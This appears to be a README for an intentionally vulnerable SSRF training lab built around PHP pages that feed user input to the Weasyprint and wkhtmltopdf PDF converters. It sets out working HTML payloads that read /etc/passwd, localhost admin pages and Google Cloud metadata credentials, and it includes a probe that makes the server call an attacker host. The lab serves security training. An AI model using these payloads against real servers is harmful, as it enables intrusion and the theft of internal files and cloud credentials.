Exploitation Difficulty: Easy
These are the SSRF scenario based on the fact that when web application accepting the user user input, placing them in HTML and pass the HTML code to "HTML to PDF generator".
When HTML code will be processed by the "HTML to PDF generator", HTML code will be evaluated to corresponding representation of that HTML code in web browser.
In this case, if attacker supplied data is not getting senitized or filtered before placing it to HTML code, attacker can trick "HTML to PDF generator" software to access the internal Hosts/domains.
We have scenarios of 2 "HTML to PDF generator" which allow an attacker to exploit SSRF vulnerability if web application is passing the untrusted user supplied data to HTML code.
These "HTML to PDF generator" are:
1. Weasyprint
2. wkhtmltopdf
pdf_ssrf_weasyprint.php is vulnerable script which is using weasyprint.
pdf_ssrf_wkhtmltopdf.php is vulnerable script which is using wkhtmltopdf.
1.1 System Requirements:
1. Weasyprint and wkhtmltopdf converter must be installed on the machine.
2. Web server with PHP support
1.2.1 Linux based setup: wkhtmltopdf
No change is required. This script is developed to work on Linux OS.
1.2.2 Windows based setup:
Below mentioned changes will be required:
Remove comment syntax from the line no "271" and "272" and make them like this
$path_pdf_converter='C:\Program Files\wkhtmltopdf\bin\wkhtmltopdf.exe'; /*remove the comment if you want to use it on Windows machine*/
passthru('"'.$path_pdf_converter.'" -T 0 -R 0 -B 0 -L 0 --orientation Portrait --page-size A4 sample.html output4.pdf'); /*remove the comment if you want to use it on Windows machine*/
Comment out the the line number 273 like this
//passthru('xvfb-run wkhtmltopdf -T 0 -R 0 -B 0 -L 0 --orientation Portrait --page-size A4 --quiet sample.html output4.pdf 2>&1');
1.3 Installation
wkthmltopdf
sudo apt-get update
sudo apt-get install xvfb libfontconfig wkhtmltopdf
weasyprint
As per the OS, follow steps from below mentioned URL to install the weasyprint:
https://weasyprint.readthedocs.io/en/stable/install.html
Let's start with exploitation and possible attack vectors to perform SSRF.
2.1 SSRF in Weasyprint HTML to PDF generator
Web application accepting user input via GUI.
Accepted the user input, placed it inside the HTML code and generated PDF by rendering the HTML code
After observing such behavior, try with following payloads to confirm whether web application code is vulnerable:
<h1>test</h1>
<img src=http://attacker_server_IP/>
If web application is processing the above mentioned payloads, go for below mentioned payloads to exploit SSRF.
Payloads
To grab the data from HTTP based URL, use below mentioned style payload
<link rel=attachment href="http://web_URL">
<link rel=attachment href="http://localhost/admin.php">
To grab the data from internal file system, use below mentioned style payload
<link rel=attachment href="file://internal_file_path">
<link rel=attachment href="file:///etc/passwd">
2.1.1 Exploiting the SSRF - Google Cloud Metadata endpoint access
Let's assume, web application is hosted inside the Google Cloud Platform. Now, try to grab the data from Google Cloud internal Metadata endpoint. I saved sample username and password during the creation of the Virtual machine which are accessible on below mentioned URL: http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes
Below mentioned payload will grab and attach the HTTP response from the above metnioned Metadata URL to PDF:
<link rel=attachment href="http://metadata.google.internal/computeMetadata/v1beta1/instance/?recursive=true">
Open the generated PDF and observe, nothing is there in customer name column. Download the generated PDF file to extract the data from it.
Extract the attached content from the downloaded PDF file using this Python Script developed by Ben AKA Nahamsec.
python script.py downloaded_file.pdf
And Python script extracted the attached HTTP response from the Internal Metadata URL.
This is how an attacker can extract the HTTP response from other internal IPs/Hosts.
2.2 SSRF in wkhtmltopdf, HTML to PDF generator
An attacker can exploit SSRF in web application using wkhtmltopdf to generate the PDF from HTML having untrusted user supplied data placed in it.
Web application is accepting user supplied data
Generated PDF has user supplied data.
Payload to load internal app rendered HTTP response inside the PDF using <iframe> HTML tag is:
<iframe src="http://internal_app" height=800px width=800px></iframe>
Payload to access the web page which has "X-Frame-Options" header in HTTP response and can not be loaded inside the <iframe> HTML tag.
<body onload="document.createElement('form').submit.call(document.getElementById('myForm'))"><form id="myForm" name="myForm" action="http://internal_app" method=GET></form></body>
Specify the above mentioned payload and submit the form
Open the generated the PDF and there we go....
./Thanks